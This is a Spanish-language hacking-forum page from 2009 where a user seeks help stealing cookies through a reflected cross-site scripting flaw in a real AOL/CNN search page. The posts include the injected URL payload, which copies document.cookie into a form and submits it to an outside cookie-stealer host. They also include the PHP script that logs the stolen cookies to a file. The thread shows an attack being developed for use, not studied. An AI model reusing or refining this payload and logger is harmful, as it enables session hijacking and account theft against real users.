elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Nivel Web / Re: Necesito ayuda con xss. La cookie esta muy larga. en: 28 Noviembre 2009, 21:35 pm
Okay primeramente gracias por tu ayuda en tu primer post.Los links no me ayudaron para decirte la verdad pero me ayudo lo que me dijiste de
"También puedes inyectar al DOM un formulario para enviar todo atraves de una sola petición post."

Eso fue lo que me ayudo mas.

Okay aqui esta mi nuevo link nadamas que ahora tengo otro problema , pero es mejor que antes

http://cnn.search.aol.com/aol/weboffers?invocationType=%22%3E%3Cscript%3Ealert%28document.forms
  • .elements[1].value=document.cookie%29;alert%28document.forms[0].action%20=%20%27http://gotcookie1.orgfree.com/cookiestealer.php%27%29;alert%28document.forms[0].submit%28%29%29%3C/script%3E&query=query1

si te fijas . hice lo que tu me dijiste , cambie 3 cosas.
El action, ha el php de mi cookiestealer.php
Puse la cookie en Query1
y la hice submit.
Pero cuando clickeo en link me dice 'undefined'

y ese es my cookiestealer.php
<?php
$cookie = urldecode($_POST['q']);
$fp = fopen("log.txt", "a");
fwrite($fp, "$cookie \n");
fclose($fp);
?>

2  Seguridad Informática / Nivel Web / Re: Necesito ayuda con xss. La cookie esta muy larga. en: 28 Noviembre 2009, 19:01 pm
Okay gracias despues regreso voy a escuchar y hacer lo que me  dijo WHK
3  Seguridad Informática / Nivel Web / Re: Necesito ayuda con xss. La cookie esta muy larga. en: 28 Noviembre 2009, 18:42 pm

okay ese es el link

Código:
http://cnn.search.aol.com/aol/weboffers?invocationType=%22%3E%3Cscript%3Ealert%28document.cookie.length%29%3C/script%3E&query=query1

si te fijas la cookie tiene 698 characters,no pasaria toda la cookie con un GET command. Como lo haria con un post, que no hay otra manera de pasar toda la cookie parte a parte.
4  Seguridad Informática / Nivel Web / Necesito ayuda con xss. La cookie esta muy larga. en: 28 Noviembre 2009, 18:30 pm
okay tengo un problema pasando la cookie a mi cookiestealer.php.

El problema que tengo es que no puedo pasar todo el contenido de la cookie, porque la cookie tiene mas de 255 characters y cuando la paso con GET mi cookiestealer.php no recive toda la cookie.

Hay una manera de guardar la cookie en partes con nombres, osea acceder la cookie por sección embes de todo junto.porque no puedo poner todo el contenido de la cookie con un GET command en la url porque hay un limite de 255 characters en la url.
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines